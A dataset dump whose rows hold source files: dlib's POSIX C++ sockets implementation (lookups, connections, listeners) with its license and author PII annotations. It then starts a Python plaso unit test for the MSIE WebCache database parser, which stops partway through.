content
stringlengths 66
45k
| language
stringclasses 11
values | license
stringclasses 14
values | path
stringlengths 20
176
| annotation_id
stringlengths 36
36
| pii
stringlengths 2
19.6k
| pii_modified
stringlengths 2
19.6k
|
---|---|---|---|---|---|---|
// Copyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg
// License: Boost Software License See LICENSE.txt for the full license.
#ifndef DLIB_SOCKETS_KERNEL_2_CPp_
#define DLIB_SOCKETS_KERNEL_2_CPp_
#include "../platform.h"
#ifdef POSIX
#include "sockets_kernel_2.h"
#include <fcntl.h>
#include "../set.h"
#include <netinet/tcp.h>
#define SA_IN(sa) reinterpret_cast<sockaddr_in*>(&sa)
#define SA_IN6(sa) reinterpret_cast<sockaddr_in6*>(&sa)
namespace dlib
{
// ----------------------------------------------------------------------------------------
#ifdef HPUX
typedef int dsocklen_t;
#else
typedef socklen_t dsocklen_t;
#endif
// ----------------------------------------------------------------------------------------
// stuff to ensure that the signal SIGPIPE is ignored before any connections are made
// so that when a connection object is shutdown the program won't end on a broken pipe
namespace sockets_kernel_2_mutex
{
    // Serializes sockets_startup() so the SIGPIPE handler is installed
    // exactly once; also used to serialize the non-thread-safe cygwin
    // gethostbyname()/gethostbyaddr() lookups.
    mutex startup_lock;
}
void sockets_startup()
{
    // Serialize initialization so SIGPIPE is ignored exactly once, no
    // matter how many threads race to create the first socket.
    sockets_kernel_2_mutex::startup_lock.lock();
    static bool initialized = false;
    if (!initialized)
    {
        // Ignore SIGPIPE so that writing to a connection the peer has
        // closed yields an error return instead of killing the process.
        signal(SIGPIPE, SIG_IGN);
        initialized = true;
    }
    sockets_kernel_2_mutex::startup_lock.unlock();
}
// ----------------------------------------------------------------------------------------
// lookup functions
int
get_local_hostname (
    std::string& hostname
)
{
    // Queries the OS for this machine's host name and stores it in
    // hostname.  Returns 0 on success or OTHER_ERROR on failure.
    try
    {
        char buf[MAXHOSTNAMELEN];
        if (gethostname(buf, MAXHOSTNAMELEN) == -1)
            return OTHER_ERROR;
        // gethostname() may not NUL-terminate on truncation, so force it.
        buf[MAXHOSTNAMELEN-1] = '\0';
        hostname = buf;
        return 0;
    }
    catch (...)
    {
        // std::string assignment can throw (e.g. std::bad_alloc)
        return OTHER_ERROR;
    }
}
// -----------------
// cygwin currently doesn't support the getaddrinfo stuff
#ifndef __CYGWIN__
int
hostname_to_ip (
    const std::string& hostname,
    std::string& ip,
    int n
)
{
    // Resolves hostname and stores its nth unique IPv4 address in ip.
    // Returns 0 on success or OTHER_ERROR on failure.
    try
    {
        set<std::string>::kernel_1a sos;
        if (hostname.empty())
            return OTHER_ERROR;
        addrinfo* result = 0;
        if (getaddrinfo(hostname.c_str(),0,0,&result))
        {
            return OTHER_ERROR;
        }
        addrinfo* result_orig = result;
        // Loop over all the addrinfo structures and collect the unique
        // IPv4 addresses.  Different platforms return duplicates and
        // multiple address families, hence the set.
        while (result != 0)
        {
            // Only convert IPv4 entries: without hints getaddrinfo can also
            // return AF_INET6 records, and inet_ntop(AF_INET, ...) applied
            // to an IPv6 sockaddr would produce a garbage string.
            if (result->ai_family == AF_INET && result->ai_addr != 0)
            {
                char temp[16];
                const char* text = inet_ntop (
                    AF_INET,
                    &((reinterpret_cast<sockaddr_in*>(result->ai_addr))->sin_addr),
                    temp,16
                );
                if (text != 0)
                {
                    ip.assign(temp);
                    if (sos.is_member(ip) == false)
                        sos.add(ip);
                }
            }
            result = result->ai_next;
        }
        freeaddrinfo(result_orig);
        // now return the nth unique ip address
        int i = 0;
        while (sos.move_next())
        {
            if (i == n)
            {
                ip = sos.element();
                return 0;
            }
            ++i;
        }
        // fewer than n+1 unique addresses were found
        return OTHER_ERROR;
    }
    catch (...)
    {
        return OTHER_ERROR;
    }
}
// -----------------
int
ip_to_hostname (
    const std::string& ip,
    std::string& hostname
)
{
    // Performs a reverse DNS lookup of the given IPv4 address and stores
    // the result in hostname.  Returns 0 on success or OTHER_ERROR.
    try
    {
        if (ip.empty())
            return OTHER_ERROR;
        sockaddr_in sa;
        // Zero the whole struct so getnameinfo doesn't see a garbage
        // sin_port or uninitialized padding bytes.
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        // If the ip string can't be parsed, fail rather than handing an
        // uninitialized sin_addr to getnameinfo.
        if (inet_pton(AF_INET,ip.c_str(),&sa.sin_addr) != 1)
            return OTHER_ERROR;
        char temp[NI_MAXHOST];
        if ( getnameinfo (
                reinterpret_cast<sockaddr*>(&sa),sizeof(sockaddr_in),
                temp,
                NI_MAXHOST,
                0,
                0,
                NI_NAMEREQD
             )
           )
        {
            return OTHER_ERROR;
        }
        hostname.assign(temp);
    }
    catch (...)
    {
        // std::string operations can throw (e.g. std::bad_alloc)
        return OTHER_ERROR;
    }
    return 0;
}
#else
int
hostname_to_ip (
    const std::string& hostname,
    std::string& ip,
    int n
)
{
    // Resolves hostname via gethostbyname() (cygwin lacks getaddrinfo) and
    // stores its nth address in ip.  Returns 0 on success or OTHER_ERROR.
    try
    {
        // lock this mutex since gethostbyname isn't really thread safe
        auto_mutex M(sockets_kernel_2_mutex::startup_lock);
        // if no hostname was given then return error
        if ( hostname.empty())
            return OTHER_ERROR;
        hostent* address;
        address = gethostbyname(hostname.c_str());
        if (address == 0)
        {
            return OTHER_ERROR;
        }
        // find the nth address; h_addr_list is a NULL terminated array, so
        // hitting a 0 entry means there is no nth address
        in_addr* addr = reinterpret_cast<in_addr*>(address->h_addr_list[0]);
        for (int i = 1; i <= n; ++i)
        {
            addr = reinterpret_cast<in_addr*>(address->h_addr_list[i]);
            // if there is no nth address then return error
            if (addr == 0)
                return OTHER_ERROR;
        }
        char* resolved_ip = inet_ntoa(*addr);
        // check if inet_ntoa returned an error
        if (resolved_ip == NULL)
        {
            return OTHER_ERROR;
        }
        ip.assign(resolved_ip);
    }
    catch(...)
    {
        // std::string operations can throw (e.g. std::bad_alloc)
        return OTHER_ERROR;
    }
    return 0;
}
// -----------------
int
ip_to_hostname (
    const std::string& ip,
    std::string& hostname
)
{
    // Reverse-resolves an IPv4 address via gethostbyaddr() (cygwin lacks
    // getnameinfo).  Returns 0 on success or OTHER_ERROR on failure.
    try
    {
        // lock this mutex since gethostbyaddr isn't really thread safe
        auto_mutex M(sockets_kernel_2_mutex::startup_lock);
        // if no ip was given then return error
        if (ip.empty())
            return OTHER_ERROR;
        hostent* address;
        unsigned long ipnum = inet_addr(ip.c_str());
        // if inet_addr couldn't convert ip then return an error
        if (ipnum == INADDR_NONE)
        {
            return OTHER_ERROR;
        }
        // the 4 is the size of an IPv4 address in bytes
        address = gethostbyaddr(reinterpret_cast<char*>(&ipnum),4,AF_INET);
        // check if gethostbyaddr returned an error
        if (address == 0)
        {
            return OTHER_ERROR;
        }
        hostname.assign(address->h_name);
    }
    catch (...)
    {
        // std::string operations can throw (e.g. std::bad_alloc)
        return OTHER_ERROR;
    }
    return 0;
}
#endif // __CYGWIN__
// ----------------------------------------------------------------------------------------
// Construct a connection that wraps an already-connected socket descriptor
// together with the addresses of its two endpoints.  The shutdown flags
// (sd, sdo) start cleared and sdr (presumably the shutdown return status —
// confirm against the header) starts at 0.
connection::
connection(
    int sock,
    int foreign_port,
    const std::string& foreign_ip,
    int local_port,
    const std::string& local_ip
) :
    connection_socket(sock),
    connection_foreign_port(foreign_port),
    connection_foreign_ip(foreign_ip),
    connection_local_port(local_port),
    connection_local_ip(local_ip),
    sd(false),
    sdo(false),
    sdr(0)
{}
// ----------------------------------------------------------------------------------------
int connection::
disable_nagle()
{
    // Disables Nagle's algorithm (TCP_NODELAY) on this connection so small
    // writes go out immediately instead of being coalesced.
    // Returns 0 on success or OTHER_ERROR if setsockopt fails.
    int flag = 1;
    // use reinterpret_cast for consistency with the other setsockopt calls
    // in this file rather than a C-style cast
    if(setsockopt( connection_socket, IPPROTO_TCP, TCP_NODELAY,
                   reinterpret_cast<const void*>(&flag), sizeof(flag) ))
    {
        return OTHER_ERROR;
    }
    return 0;
}
// ----------------------------------------------------------------------------------------
long connection::
write (
    const char* buf,
    long num
)
{
    // Sends exactly num bytes from buf, looping until everything has been
    // written.  Returns num on success, SHUTDOWN if shutdown/
    // shutdown_outgoing was called, or OTHER_ERROR on any other failure.
    const long old_num = num;
    long status;
    const long max_send_length = 1024*1024*100;
    while (num > 0)
    {
        // Make sure to cap the max value num can take on so that if it is
        // really large (it might be big on 64bit platforms) so that the OS
        // can't possibly get upset about it being large.
        const long length = std::min(max_send_length, num);
        if ( (status = ::send(connection_socket,buf,length,0)) <=0)
        {
            // if send was interrupted by a signal then restart it
            if (errno == EINTR)
            {
                continue;
            }
            else
            {
                // check if shutdown or shutdown_outgoing have been called
                if (sdo_called())
                    return SHUTDOWN;
                else
                    return OTHER_ERROR;
            }
        }
        // advance past the bytes that were actually sent (send may write
        // fewer than requested)
        num -= status;
        buf += status;
    }
    return old_num;
}
// ----------------------------------------------------------------------------------------
long connection::
read (
    char* buf,
    long num
)
{
    // Reads up to num bytes into buf, blocking until at least one byte is
    // available.  Returns the number of bytes read, SHUTDOWN if shutdown
    // was called, or OTHER_ERROR on failure.
    long status;
    const long max_recv_length = 1024*1024*100;
    while (true)
    {
        // Make sure to cap the max value num can take on so that if it is
        // really large (it might be big on 64bit platforms) so that the OS
        // can't possibly get upset about it being large.
        const long length = std::min(max_recv_length, num);
        status = recv(connection_socket,buf,length,0);
        if (status == -1)
        {
            // if recv was interrupted then try again
            if (errno == EINTR)
                continue;
            else
            {
                if (sd_called())
                    return SHUTDOWN;
                else
                    return OTHER_ERROR;
            }
        }
        else if (status == 0 && sd_called())
        {
            // 0 bytes means EOF; report SHUTDOWN only when we initiated it
            return SHUTDOWN;
        }
        return status;
    } // while (true)
}
// ----------------------------------------------------------------------------------------
long connection::
read (
    char* buf,
    long num,
    unsigned long timeout
)
{
    // Reads up to num bytes into buf, waiting at most timeout milliseconds
    // for data to arrive.  Returns the byte count, TIMEOUT, SHUTDOWN, or
    // OTHER_ERROR.
    long status;
    const long max_recv_length = 1024*1024*100;
    if (readable(timeout) == false)
        return TIMEOUT;
    // Make sure to cap the max value num can take on so that if it is
    // really large (it might be big on 64bit platforms) so that the OS
    // can't possibly get upset about it being large.
    const long length = std::min(max_recv_length, num);
    status = recv(connection_socket,buf,length,0);
    if (status == -1)
    {
        // if recv was interrupted then call this a timeout
        if (errno == EINTR)
        {
            return TIMEOUT;
        }
        else
        {
            if (sd_called())
                return SHUTDOWN;
            else
                return OTHER_ERROR;
        }
    }
    else if (status == 0 && sd_called())
    {
        // 0 bytes means EOF; report SHUTDOWN only when we initiated it
        return SHUTDOWN;
    }
    return status;
}
// IPV6 Helpers
static inline bool sockaddr_name(sockaddr_storage &sin, std::string &name)
{
    // Convert the IPv4 or IPv6 address stored in sin to its printable text
    // form.  Returns true on success and stores the text in name.
    char text[INET6_ADDRSTRLEN];
    const void *src;
    if (sin.ss_family == AF_INET6)
        src = &reinterpret_cast<sockaddr_in6*>(&sin)->sin6_addr;
    else
        src = &reinterpret_cast<sockaddr_in*>(&sin)->sin_addr;
    const char *out = inet_ntop(sin.ss_family, src, text, INET6_ADDRSTRLEN);
    if (out == NULL)
        return false;
    name.assign(out);
    return true;
}
static inline int sockaddr_port(sockaddr_storage &sin)
{
    // Return the port number stored in sin, converted to host byte order.
    return (sin.ss_family == AF_INET6)
        ? ntohs(reinterpret_cast<sockaddr_in6*>(&sin)->sin6_port)
        : ntohs(reinterpret_cast<sockaddr_in*>(&sin)->sin_port);
}
static inline void set_sockaddr_port(sockaddr_storage &sin, int port)
{
    // Store port (given in host byte order) into sin in network byte order,
    // honoring whichever address family sin already carries.
    if (sin.ss_family == AF_INET6)
        reinterpret_cast<sockaddr_in6*>(&sin)->sin6_port = htons(port);
    else
        reinterpret_cast<sockaddr_in*>(&sin)->sin_port = htons(port);
}
static inline sa_family_t sockaddr_family(const std::string &ip, dsocklen_t &len)
{
    // Decide the address family from the textual ip: any string containing
    // a ':' is treated as IPv6; an empty string defaults to IPv4.  Also
    // stores the size of the matching sockaddr structure into len.
    const bool is_v6 = !ip.empty() && ip.find(':') != std::string::npos;
    if (is_v6)
    {
        len = sizeof(sockaddr_in6);
        return AF_INET6;
    }
    len = sizeof(sockaddr_in);
    return AF_INET;
}
static inline bool set_sockaddr_address(sockaddr_storage &sin, const std::string &ip)
{
    // Parse the textual ip and store it into sin, honoring sin's address
    // family.  Returns false when ip is not valid for that family.
    void *dst = (sin.ss_family == AF_INET6)
        ? static_cast<void*>(&reinterpret_cast<sockaddr_in6*>(&sin)->sin6_addr)
        : static_cast<void*>(&reinterpret_cast<sockaddr_in*>(&sin)->sin_addr);
    return inet_pton(sin.ss_family, ip.c_str(), dst) == 1;
}
static inline void sockaddr_inaddr_any(sockaddr_storage &sin)
{
    // Set the wildcard "listen on any interface" address appropriate for
    // sin's address family.
    if (sin.ss_family == AF_INET6)
        memcpy(&reinterpret_cast<sockaddr_in6*>(&sin)->sin6_addr,
               &in6addr_any, sizeof(in6addr_any));
    else
        // INADDR_ANY is a 32 bit quantity, so the correct conversion is
        // htonl; the previous htons only worked because INADDR_ANY == 0.
        reinterpret_cast<sockaddr_in*>(&sin)->sin_addr.s_addr = htonl(INADDR_ANY);
}
// ----------------------------------------------------------------------------------------
bool connection::
readable (
    unsigned long timeout
) const
{
    // Returns true if data can be read from this connection within timeout
    // milliseconds; false on timeout or on a select() error.
    // NOTE(review): FD_SET with a descriptor >= FD_SETSIZE is undefined
    // behavior; this assumes fds stay below FD_SETSIZE -- consider poll().
    fd_set read_set;
    // initialize read_set
    FD_ZERO(&read_set);
    // add this connection's socket to read_set
    FD_SET(connection_socket, &read_set);
    // setup a timeval structure expressing the timeout
    timeval time_to_wait;
    time_to_wait.tv_sec = static_cast<long>(timeout/1000);
    time_to_wait.tv_usec = static_cast<long>((timeout%1000)*1000);
    // wait on select
    int status = select(connection_socket+1,&read_set,0,0,&time_to_wait);
    // if select timed out or there was an error
    if (status <= 0)
        return false;
    // socket is ready to be read
    return true;
}
// ----------------------------------------------------------------------------------------
connection::
~connection (
)
{
    // Close the socket, retrying if close() is interrupted by a signal.
    int result;
    do
    {
        result = ::close(connection_socket);
    } while (result == -1 && errno == EINTR);
}
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
// listener object
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
// Construct a listener wrapping an already-listening socket descriptor.
// inaddr_any records whether we are bound to all interfaces (empty ip);
// accept() uses it to decide how to determine each connection's local ip.
listener::
listener(
    int sock,
    int port,
    const std::string& ip
) :
    listening_socket(sock),
    listening_port(port),
    listening_ip(ip),
    inaddr_any(listening_ip.empty())
{}
// ----------------------------------------------------------------------------------------
listener::
~listener (
)
{
    // Close the listening socket, retrying if close() is interrupted by a
    // signal.
    int result;
    do
    {
        result = ::close(listening_socket);
    } while (result == -1 && errno == EINTR);
}
// ----------------------------------------------------------------------------------------
int listener::
accept (
    scoped_ptr<connection>& new_connection,
    unsigned long timeout
)
{
    // Convenience overload: forwards to the raw-pointer accept() and, on
    // success, transfers ownership of the new connection to the scoped_ptr.
    new_connection.reset(0);
    connection* con;
    int status = this->accept(con, timeout);
    if (status == 0)
        new_connection.reset(con);
    return status;
}
// ----------------------------------------------------------------------------------------
int listener::
accept (
    connection*& new_connection,
    unsigned long timeout
)
{
    // Waits (up to timeout milliseconds, or forever when timeout == 0) for
    // an incoming connection and, on success, stores a heap-allocated
    // connection object in new_connection.  Returns 0 on success, TIMEOUT,
    // or OTHER_ERROR.
    int incoming;
    sockaddr_storage incomingAddr;
    dsocklen_t length = sizeof(sockaddr_storage);
    // implement timeout with select if timeout is > 0
    if (timeout > 0)
    {
        timeval time_to_wait;
        // loop on select so if it is interrupted then we can start it again
        while (true)
        {
            // (Re)initialize the fd_set on every iteration: select()
            // modifies the set, and after an error (e.g. EINTR) its
            // contents are unspecified, so it must be rebuilt before each
            // retry.
            fd_set read_set;
            FD_ZERO(&read_set);
            FD_SET(listening_socket, &read_set);
            // setup a timeval structure
            time_to_wait.tv_sec = static_cast<long>(timeout/1000);
            time_to_wait.tv_usec = static_cast<long>((timeout%1000)*1000);
            // wait on select
            int status = select(listening_socket+1,&read_set,0,0,&time_to_wait);
            // if select timed out
            if (status == 0)
                return TIMEOUT;
            // if select returned an error
            if (status == -1)
            {
                // if select was interrupted or the connection was aborted
                // then go back to select
                if (errno == EINTR ||
                    errno == ECONNABORTED ||
#ifdef EPROTO
                    errno == EPROTO ||
#endif
                    errno == ECONNRESET
                    )
                {
                    continue;
                }
                else
                {
                    return OTHER_ERROR;
                }
            }
            // accept the new connection
            incoming=::accept (
                listening_socket,
                reinterpret_cast<sockaddr*>(&incomingAddr),
                &length
                );
            // if there was an error return OTHER_ERROR
            if ( incoming == -1 )
            {
                // if accept was interrupted then go back to accept
                if (errno == EINTR ||
                    errno == ECONNABORTED ||
#ifdef EPROTO
                    errno == EPROTO ||
#endif
                    errno == ECONNRESET
                    )
                {
                    continue;
                }
                else
                {
                    return OTHER_ERROR;
                }
            }
            // if there were no errors then quit loop
            break;
        }
    }
    // else if there is no time out then just go into accept
    else
    {
        while (true)
        {
            // call accept to get a new connection
            incoming=::accept (
                listening_socket,
                reinterpret_cast<sockaddr*>(&incomingAddr),
                &length
                );
            // if there was an error return OTHER_ERROR
            if ( incoming == -1 )
            {
                // if accept was interrupted then go back to accept
                if (errno == EINTR ||
                    errno == ECONNABORTED ||
#ifdef EPROTO
                    errno == EPROTO ||
#endif
                    errno == ECONNRESET
                    )
                {
                    continue;
                }
                else
                {
                    return OTHER_ERROR;
                }
            }
            break;
        }
    }
    // get the port of the foreign host into foreign_port
    int foreign_port = sockaddr_port(incomingAddr);
    // get the IP of the foreign host into foreign_ip
    std::string foreign_ip;
    sockaddr_name(incomingAddr, foreign_ip);
    // get the local ip for this connection into local_ip
    std::string local_ip;
    if (inaddr_any == true)
    {
        sockaddr_storage local_info;
        // Use the full storage size here: sizeof(sockaddr_in) would be too
        // small for getsockname to return an IPv6 local address.
        length = sizeof(sockaddr_storage);
        // get the local address associated with this new connection
        if ( getsockname (
                incoming,
                reinterpret_cast<sockaddr*>(&local_info),
                &length
             ) == -1
           )
        {   // an error occurred: close the accepted socket (retrying on
            // EINTR) so it doesn't leak, then fail
            while (true)
            {
                int status = ::close(incoming);
                if (status == -1 && errno == EINTR)
                    continue;
                break;
            }
            return OTHER_ERROR;
        }
        sockaddr_name(local_info, local_ip);
    }
    else
    {
        local_ip = listening_ip;
    }
    // set the SO_OOBINLINE option so out-of-band data is delivered in the
    // normal data stream
    int flag_value = 1;
    if (setsockopt(incoming,SOL_SOCKET,SO_OOBINLINE,reinterpret_cast<const void*>(&flag_value),sizeof(int)))
    {
        while (true)
        {
            int status = ::close(incoming);
            if (status == -1 && errno == EINTR)
                continue;
            break;
        }
        return OTHER_ERROR;
    }
    // make a new connection object for this new connection
    try
    {
        new_connection = new connection (
            incoming,
            foreign_port,
            foreign_ip,
            listening_port,
            local_ip
            );
    }
    catch (...)
    {
        // allocation failed: don't leak the accepted socket
        while (true)
        {
            int status = ::close(incoming);
            if (status == -1 && errno == EINTR)
                continue;
            break;
        }
        return OTHER_ERROR;
    }
    return 0;
}
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
// socket creation functions
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
static void
close_socket (
    int sock
)
/*!
    requires
        - sock == a socket
    ensures
        - sock has been closed
!*/
{
    // Retry close() until it either succeeds or fails for a reason other
    // than being interrupted by a signal.
    int result;
    do
    {
        result = ::close(sock);
    } while (result == -1 && errno == EINTR);
}
// ----------------------------------------------------------------------------------------
int create_listener (
    scoped_ptr<listener>& new_listener,
    unsigned short port,
    const std::string& ip
)
{
    // Convenience overload: forwards to the raw-pointer create_listener
    // and, on success, transfers ownership of the listener to the
    // scoped_ptr.
    new_listener.reset();
    listener* temp;
    int status;
    status = create_listener(temp,port,ip);
    if (status == 0)
        new_listener.reset(temp);
    return status;
}
int create_listener (
    listener*& new_listener,
    unsigned short port,
    const std::string& ip
)
{
    // Creates a TCP listening socket bound to the given ip/port and wraps
    // it in a heap-allocated listener stored in new_listener.  port == 0
    // picks an ephemeral port; an empty ip listens on all interfaces.
    // Returns 0 on success, PORTINUSE, or OTHER_ERROR.
    sockets_startup();
    sockaddr_storage sas;
    memset(&sas, 0, sizeof(sockaddr_storage)); // Initialize sas
    dsocklen_t length;
    // pick AF_INET or AF_INET6 from the ip string and get the matching
    // sockaddr size into length
    sas.ss_family = sockaddr_family(ip, length);
#ifdef __APPLE__
    sas.ss_len = length;
#endif
    int sock = socket (sas.ss_family, SOCK_STREAM, 0); // get a new socket
    // if socket() returned an error then return OTHER_ERROR
    if (sock == -1)
    {
        return OTHER_ERROR;
    }
    set_sockaddr_port(sas, port);
    // set the local socket structure
    if (ip.empty())
    {
        // if the listener should listen on any IP
        sockaddr_inaddr_any(sas);
    }
    else
    {
        // if there is a specific ip to listen on
        // if the ip string couldn't be converted then return an error
        if (!set_sockaddr_address(sas, ip))
        {
            close_socket(sock);
            return OTHER_ERROR;
        }
    }
    // set the SO_REUSEADDR option so that restarting a server doesn't fail
    // with "address in use" while old connections sit in TIME_WAIT
    int flag_value = 1;
    if (setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,reinterpret_cast<const void*>(&flag_value),sizeof(int)))
    {
        close_socket(sock);
        return OTHER_ERROR;
    }
    // bind the new socket to the requested port and ip
    if (bind(sock,reinterpret_cast<sockaddr*>(&sas), length) == -1)
    {   // if there was an error
        close_socket(sock);
        // if the port is already bound then return PORTINUSE
        if (errno == EADDRINUSE)
            return PORTINUSE;
        else
            return OTHER_ERROR;
    }
    // tell the new socket to listen
    if ( listen(sock,SOMAXCONN) == -1)
    {
        // if there was an error return OTHER_ERROR
        close_socket(sock);
        // if the port is already bound then return PORTINUSE
        if (errno == EADDRINUSE)
            return PORTINUSE;
        else
            return OTHER_ERROR;
    }
    // determine the used local port if necessary (the OS chose one for us
    // when port was 0)
    if (port == 0)
    {
        sockaddr_storage local_info;
        if ( getsockname(
                sock,
                reinterpret_cast<sockaddr*>(&local_info),
                &length
             ) == -1)
        {
            close_socket(sock);
            return OTHER_ERROR;
        }
        port = sockaddr_port(local_info);
    }
    // initialize a listener object on the heap with the new socket
    try { new_listener = new listener(sock,port,ip); }
    catch(...) { close_socket(sock); return OTHER_ERROR; }
    return 0;
}
// ----------------------------------------------------------------------------------------
int create_connection (
    scoped_ptr<connection>& new_connection,
    unsigned short foreign_port,
    const std::string& foreign_ip,
    unsigned short local_port,
    const std::string& local_ip
)
{
    // Convenience overload: forwards to the raw-pointer create_connection
    // and, on success, transfers ownership of the connection to the
    // scoped_ptr.
    new_connection.reset();
    connection* temp;
    int status = create_connection(temp,foreign_port, foreign_ip, local_port, local_ip);
    if (status == 0)
        new_connection.reset(temp);
    return status;
}
int
create_connection (
    connection*& new_connection,
    unsigned short foreign_port,
    const std::string& foreign_ip,
    unsigned short local_port,
    const std::string& local_ip
)
{
    // Creates a TCP connection to foreign_ip:foreign_port, optionally
    // bound to local_ip:local_port (0/empty lets the OS choose), and
    // stores a heap-allocated connection object in new_connection.
    // Returns 0 on success, PORTINUSE, or OTHER_ERROR.
    sockets_startup();
    dsocklen_t length;
    // the address family (and sockaddr size) is decided by the foreign ip
    sa_family_t family = sockaddr_family(foreign_ip, length);
    sockaddr_storage local_sa; // local socket structure
    sockaddr_storage foreign_sa; // foreign socket structure
    memset(&local_sa,'\0',sizeof(sockaddr_storage)); // initialize local_sa
    memset(&foreign_sa,'\0',sizeof(sockaddr_storage)); // initialize foreign_sa
#ifdef __APPLE__
    local_sa.ss_len = foreign_sa.ss_len = length;
#endif
    int sock = socket (family, SOCK_STREAM, 0); // get a new socket
    // if socket() returned an error then return OTHER_ERROR
    if (sock == -1 )
    {
        return OTHER_ERROR;
    }
    // set up the local and foreign socket structure
    local_sa.ss_family = family;
    foreign_sa.ss_family = family;
    set_sockaddr_port(foreign_sa, foreign_port);
    set_sockaddr_port(local_sa, local_port);
    if (!set_sockaddr_address(foreign_sa, foreign_ip))
    {
        close_socket(sock);
        return OTHER_ERROR;
    }
    // set the local ip
    if (local_ip.empty())
    {
        // bind to any local IP
        sockaddr_inaddr_any(local_sa);
    }
    else
    {
        // if there is a specific local ip to bind to
        // if the ip string couldn't be converted then return an error
        if (!set_sockaddr_address(local_sa, local_ip))
        {
            close_socket(sock);
            return OTHER_ERROR;
        }
    }
    // bind the new socket to the requested local port and local ip
    if ( bind(sock,reinterpret_cast<sockaddr*>(&local_sa), length) == -1)
    {   // if there was an error
        close_socket(sock);
        // if the port is already bound then return PORTINUSE
        if (errno == EADDRINUSE)
            return PORTINUSE;
        else
            return OTHER_ERROR;
    }
    // connect the socket
    // NOTE(review): EINTR from connect() is not retried here even though a
    // signal-interrupted connect may still complete asynchronously --
    // confirm whether callers can see signals during connect.
    if ( connect (
            sock,
            reinterpret_cast<sockaddr*>(&foreign_sa),
            length
         ) == -1
       )
    {
        close_socket(sock);
        // if the port is already bound then return PORTINUSE
        if (errno == EADDRINUSE)
            return PORTINUSE;
        else
            return OTHER_ERROR;
    }
    // determine the local port and IP and store them in used_local_ip
    // and used_local_port
    int used_local_port = local_port;
    std::string used_local_ip = local_ip;
    sockaddr_storage local_info;
    // ask the OS what it actually bound when we left it the choice
    if (local_port == 0 || local_ip.empty())
    {
        length = sizeof(sockaddr_storage);
        if ( getsockname(
                sock,
                reinterpret_cast<sockaddr*>(&local_info),
                &length
             ) == -1)
        {
            close_socket(sock);
            return OTHER_ERROR;
        }
        if (local_port == 0)
            used_local_port = sockaddr_port(local_info);
        if (local_ip.empty()) {
            if (!sockaddr_name(local_info, used_local_ip))
            {
                close_socket(sock);
                return OTHER_ERROR;
            }
        }
    }
    // set the SO_OOBINLINE option so out-of-band data is delivered in the
    // normal data stream
    int flag_value = 1;
    if (setsockopt(sock,SOL_SOCKET,SO_OOBINLINE,reinterpret_cast<const void*>(&flag_value),sizeof(int)))
    {
        close_socket(sock);
        return OTHER_ERROR;
    }
    // initialize a connection object on the heap with the new socket
    try
    {
        new_connection = new connection (
            sock,
            foreign_port,
            foreign_ip,
            used_local_port,
            used_local_ip
            );
    }
    catch(...) {close_socket(sock); return OTHER_ERROR; }
    return 0;
}
// ----------------------------------------------------------------------------------------
}
#endif // POSIX
#endif // DLIB_SOCKETS_KERNEL_2_CPp_
|
C++
|
Apache-2.0
|
JITbase/mtconnect-cppagent/lib/dlib/sockets/sockets_kernel_2.cpp
|
04f66c12-f51a-4f75-9206-5f67989b30a0
|
[{"tag": "EMAIL", "value": "davis@dlib.net", "start": 38, "end": 52, "context": "// Copyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boost Software Lice"}, {"tag": "NAME", "value": "Davis E. King", "start": 23, "end": 36, "context": "// Copyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boo"}, {"tag": "NAME", "value": "Miguel Grinberg", "start": 55, "end": 70, "context": "pyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boost Software License See LICENSE."}]
|
[{"tag": "EMAIL", "value": "davis@dlib.net", "start": 38, "end": 52, "context": "// Copyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boost Software Lice"}, {"tag": "NAME", "value": "Davis E. King", "start": 23, "end": 36, "context": "// Copyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boo"}, {"tag": "NAME", "value": "Miguel Grinberg", "start": 55, "end": 70, "context": "pyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boost Software License See LICENSE."}]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Microsoft Internet Explorer WebCache database."""
import unittest
from plaso.lib import definitions
from plaso.parsers.esedb_plugins import msie_webcache
from tests.parsers.esedb_plugins import test_lib
class MsieWebCacheESEDBPluginTest(test_lib.ESEDBPluginTestCase):
  """Tests for the MSIE WebCache ESE database plugin."""

  # pylint: disable=protected-access

  def testConvertHeadersValues(self):
    """Tests the _ConvertHeadersValues function."""
    plugin = msie_webcache.MsieWebCacheESEDBPlugin()

    # Raw CRLF-separated HTTP response headers as stored in the database.
    binary_value = (
        b'HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n'
        b'X-Content-Type-Options: nosniff\r\nContent-Length: 2759\r\n'
        b'X-XSS-Protection: 1; mode=block\r\n'
        b'Alternate-Protocol: 80:quic\r\n\r\n')

    # The plugin flattens the headers into one bracketed, ';'-joined string.
    expected_headers_value = (
        '[HTTP/1.1 200 OK; Content-Type: image/png; '
        'X-Content-Type-Options: nosniff; Content-Length: 2759; '
        'X-XSS-Protection: 1; mode=block; '
        'Alternate-Protocol: 80:quic]')

    headers_value = plugin._ConvertHeadersValues(binary_value)
    self.assertEqual(headers_value, expected_headers_value)

  def testProcessOnDatabaseWithPartitionsTable(self):
    """Tests the Process function on database with a Partitions table."""
    plugin = msie_webcache.MsieWebCacheESEDBPlugin()
    storage_writer = self._ParseESEDBFileWithPlugin(['WebCacheV01.dat'], plugin)

    self.assertEqual(storage_writer.number_of_events, 1372)
    self.assertEqual(storage_writer.number_of_extraction_warnings, 0)
    self.assertEqual(storage_writer.number_of_recovery_warnings, 0)

    # The order in which ESEDBPlugin._GetRecordValues() generates events is
    # nondeterministic hence we sort the events.
    events = list(storage_writer.GetSortedEvents())

    # Spot-check a single container event from the sorted stream.
    expected_event_values = {
        'container_identifier': 1,
        'data_type': 'msie:webcache:containers',
        'date_time': '2014-05-12 07:30:25.4861987',
        'directory': (
